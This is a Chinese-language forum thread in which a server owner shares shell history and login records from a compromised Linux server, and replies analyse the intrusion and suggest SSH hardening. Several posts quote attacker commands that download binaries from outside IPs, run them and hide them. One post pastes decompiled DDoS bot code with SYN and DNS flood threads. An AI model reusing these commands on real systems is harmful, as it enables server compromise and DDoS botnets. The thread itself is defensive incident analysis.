Home Sign Up Sign In
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
evilangel
V2EX  ›  Linux

服务器被入侵,麻烦高手帮忙分析下

  •   
  •   evilangel · Jul 7, 2014 · 13222 views
    This topic created in 4332 days ago, the information mentioned may be changed or developed.
    服务器被入侵,密码被改了,流量一下跑了很多,麻烦高手帮忙分析下,这位黑兄拿我服务器干嘛了
    root@(none):~# ls
    bulong conf.n fake.cfg ssh33 wget-log.1
    bulong.1 dlcfg getsetup.hb wget-log

    root@(none):~# history
    1 uptime
    2 ps -aux
    3 exit
    4 free -m
    5 df -h
    6 passwd
    7 ps -ef
    8 wget http://222.186.40.170:666/getsetup.hb
    9 chmod +x getsetup.hb
    10 ./getsetup.hb
    11 chattr +i getsetup.hb
    12 wget http://96.44.185.98:8080/ssh33
    13 chmod +x ssh33
    14 ./ssh33
    15 chattr +i ssh33
    16 wget http://23.228.102.152:1818/bulong
    17 ps -ef
    18 wget http://23.228.102.152:1818/bulong
    19 wget http://222.186.40.170:666/bulong
    20 chmod +x bulong
    21 ./bulong
    22 chattr +i bulong
    23 ps -ef
    24 ls
    25 history

    root@(none):/var/log# last
    root pts/1 111.8.2.138 Mon Jul 7 04:22 still logged in
    reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:22 - 04:33 (00:10)
    reboot system boot 3.15.3-x86_64-li Mon Jul 7 04:16 - 04:20 (00:04)
    root pts/0 58.22.113.155 Sun Jul 6 16:42 - 16:46 (00:03)
    root pts/1 58.22.113.155 Sun Jul 6 16:08 - 16:11 (00:03)
    root pts/0 58.22.113.155 Sun Jul 6 16:05 - 16:11 (00:06)
    root pts/0 27.158.25.16 Sun Jul 6 04:41 - 04:41 (00:00)
    root pts/0 ns405606.ip-37-1 Sat Jul 5 11:07 - 11:07 (00:00)
    root pts/0 119.39.233.73 Wed Jul 2 14:01 - 16:50 (02:49)
    root pts/0 119.39.233.73 Wed Jul 2 13:58 - 13:59 (00:00)
    reboot system boot 3.15.3-x86_64-li Wed Jul 2 13:57 - 23:14 (4+09:16)
  • Jul
  • wget
  • root@
    23 replies    2014-07-11 01:10:06 +08:00
    wzxjohn
        2
    wzxjohn  
       Jul 7, 2014
    wget http://96.44.185.98:8080/ssh33
    这个文件没下载下来,撸主能否上传到百度盘看看。
    wzxjohn
        3
    wzxjohn  
       Jul 7, 2014   ❤️ 1
    http://r.virscan.org/report/b191ce7b4ed3b5a21f0d18dc93b62d65
    http://r.virscan.org/report/85589ce710b58d7d109e7a8069889d00
    根据这两个来看这是被植入了DDoS服务程序。
    evilangel
        4
    evilangel  
    OP
       Jul 7, 2014 via iPad
    @wzxjohn 从IP上看貌似也是国人干的。
    avrillavigne
        5
    avrillavigne  
       Jul 7, 2014
    诺顿scep 报Backdoor.Piltabe
    humiaozuzu
        6
    humiaozuzu  
       Jul 7, 2014
    我有几台服务器也被入侵了,不过还好权限是 elasticsearch 结束掉进程就 OK,没有被替换文件,补了 ES 的 bug 就好。
    然后看了下下载的文件都一样,也是被用作 DDOS 了
    evilangel
        7
    evilangel  
    OP
       Jul 7, 2014
    @wzxjohn 上传到百度网盘了,地址http://pan.baidu.com/s/1pJ9atC3 另外怎么看出来这个是DDOS服务程序的?用猜的我这种最可能的是DDOS或者服务器口令自动破解程序之类的。

    @humiaozuzu 居然遇到的都是一样的。但是想不通是怎么在这么快的时间内破解我的root密码的。
    markmx
        8
    markmx  
       Jul 7, 2014
    前几天 我也被攻击了。 是土耳其的攻击。慢慢的斗智斗勇,终于搞定了
    markmx
        9
    markmx  
       Jul 7, 2014
    密码扫描这个事情。最好还是加上判断。几次输入密码错误,封闭IP!
    humiaozuzu
        10
    humiaozuzu  
       Jul 7, 2014
    @evilangel 如果不是弱口令,一般是已有的服务的 0day,比如我遇到的就是 elasticsearch 的,如果你那个服务用的是 root 权限运行,就可以随意修改密码了
    wzxjohn
        11
    wzxjohn  
       Jul 7, 2014
    @evilangel 那个查杀报告里不是写了么。。。
    henices
        12
    henices  
       Jul 7, 2014
    int __cdecl AddTask(int a1)
    {
    int v1; // ebx@1
    int v2; // ebx@2
    int v4; // eax@6
    int v5; // edi@6
    int v6; // eax@7
    int v7; // eax@11
    int v8; // eax@13

    pthread_mutex_lock(TaskLockMutex);
    v1 = taskcount;
    if ( (unsigned int)taskcount > 0x13 )
    {
    v2 = taskcount + 33554432;
    goto LABEL_3;
    }
    if ( CheckTaskExist(a1 + 80) )
    {
    v2 = v1 + 536870912;
    goto LABEL_3;
    }
    v4 = malloc(132);
    v5 = v4;
    if ( !v4 )
    {
    v2 = v1 + 134217728;
    goto LABEL_3;
    }
    memcpy(v4, a1, 112);
    v6 = *(_DWORD *)(v5 + 8);
    if ( v6 & 1 )
    {
    v7 = HbCreateThread(SynFloodThread, v5, v5 + 112, 0, 1);
    }
    else
    {
    if ( !(v6 & 2) )
    {
    LABEL_9:
    v2 = v1 + 67108864;
    free(v5);
    goto LABEL_3;
    }
    v7 = HbCreateThread(DnsFloodThread, v5, v5 + 112, 0, 1);
    }
    if ( v7 != 1 )
    goto LABEL_9;
    v8 = pMaskTask;
    if ( pMaskTask )
    {
    *(_DWORD *)(v5 + 128) = 0;
    *(_DWORD *)(v5 + 124) = v8;
    *(_DWORD *)(v8 + 128) = v5;
    pMaskTask = v5;
    }
    else
    {
    pMaskTask = v5;
    *(_DWORD *)(v5 + 124) = 0;
    *(_DWORD *)(v5 + 128) = 0;
    }
    __asm { lock add ds:taskcount, 1 }
    v2 = taskcount + 268435456;
    LABEL_3:
    pthread_mutex_unlock(TaskLockMutex);
    return v2;
    }
    evilangel
        13
    evilangel  
    OP
       Jul 7, 2014
    @markmx 厉害,膜拜了!看来后面是需要配置一下。

    @humiaozuzu 我是刚装完的系统,什么软件都没装了然后才一天时间就密码被人改了登陆不上了。重置密码之后就发现目录下面有东西然后历史命令里多了这十几条命令。

    @wzxjohn 嗯嗯,没太注意看,刚又看了下发现了。谢谢了!


    @henices 牛!!!
    davansy
        14
    davansy  
       Jul 7, 2014
    @evilangel 呵呵,还改你的密码了,看似刚出道的黑客刷存在感的样子。
    Owenjia
        15
    Owenjia  
       Jul 8, 2014 via Android
    还是禁止密码登录比较好吧~~
    jalen
        16
    jalen  
       Jul 8, 2014
    @Owenjia 禁止密码登录??还有啥其他方式?
    Owenjia
        17
    Owenjia  
       Jul 8, 2014
    @jalen 你是用的 ssh 吧?可以用密钥登陆啊~~可以看下这里 http://en.wikipedia.org/wiki/Ssh-keygen
    netpro
        18
    netpro  
       Jul 8, 2014
    @jalen 证书认证
    oldcai
        19
    oldcai  
    PRO
       Jul 9, 2014
    我也碰到同样的事情了,elasticsearch漏洞导致远程执行。
    前几天被服务商告知在发出ddos攻击,我还不太相信,因为我一直都只用公私钥,不用密码登陆。

    从log里面看来,一直在执行下面的东西。
    /etc/init.d/iptables stop
    chmod 0775 /usr/bin/nohup
    chmod 0775 /usr/bin/killall
    chmod 0775 /usr/bin/rm
    chmod 0775 /usr/bin/wget
    mkdir /etc/plngius
    killall .Linux_time_y_2014
    rm -r -f /etc/plngius/.Linux_time_y_2014
    wget -O /etc/plngius/.Linux_time_y_2014 http://119.1.109.43:4443/txma
    chmod 0755 /etc/plngius/.Linux_time_y_2014
    nohup /etc/plngius/.Linux_time_y_2014 > /dev/null 2>&1 &
    killall .Linux_time_y_2015
    rm -r -f /tmp/.Linux_time_y_2015
    wget -O /tmp/.Linux_time_y_2015 http://119.1.109.43:4443/xudp
    chmod 0755 /tmp/.Linux_time_y_2015
    nohup /tmp/.Linux_time_y_2015> /dev/null 2>&1 &
    exit
    pythoner
        20
    pythoner  
       Jul 9, 2014
    @jalen

    1,修改ssh的默认端口
    2,禁止root账号登陆
    3,新建一个账号(不要用admin之类容易猜到的账号,并设置一个复杂的密码)并让其可以sudo su成root
    4,用DenyHosts防止暴力破解将对方尝试破解的ip拒绝掉



    我贴一个日志:

    tail -n 1000 auth.log |grep 'Failed password for root '
    Jul 9 20:26:02 s1 sshd[30294]: Failed password for root from 61.128.110.39 port 45014 ssh2
    Jul 9 20:26:06 s1 sshd[30311]: Failed password for root from 61.128.110.39 port 46366 ssh2
    Jul 9 20:26:09 s1 sshd[30459]: Failed password for root from 61.128.110.39 port 47481 ssh2

    从上面的日志可以看到对方在尝试不同的端口号,由于我禁止了root账号登陆,所以就算端口号猜对了也会失败,失败3次之后 61.128.110.39就自动被防火墙拒绝掉(/etc/hosts.deny )
    tonyluj
        21
    tonyluj  
       Jul 10, 2014
    千万不要用root登录,用个普通权限的user + sudo即可,文件权限也不要用chmod 777
    SSH直接禁止ROOT + 改端口 + 证书登录

    并装上fail2ban,防止别人暴力破解
    songday
        22
    songday  
       Jul 10, 2014
    我刚刚也是被通知,说有两个机器被用作 DDOS 攻击了
    刚好上面也跑了 ES,那个 ES 补丁是在官网上的吗?
    songday
        23
    songday  
       Jul 11, 2014
    @humiaozuzu 你好,能告知一下 ES 的补丁是在哪里吗?
    我在官网上没有找到 :(
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3143 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 58ms · UTC 13:47 · PVG 21:47 · LAX 06:47 · JFK 09:47
    ♥ Do have faith in what you're doing.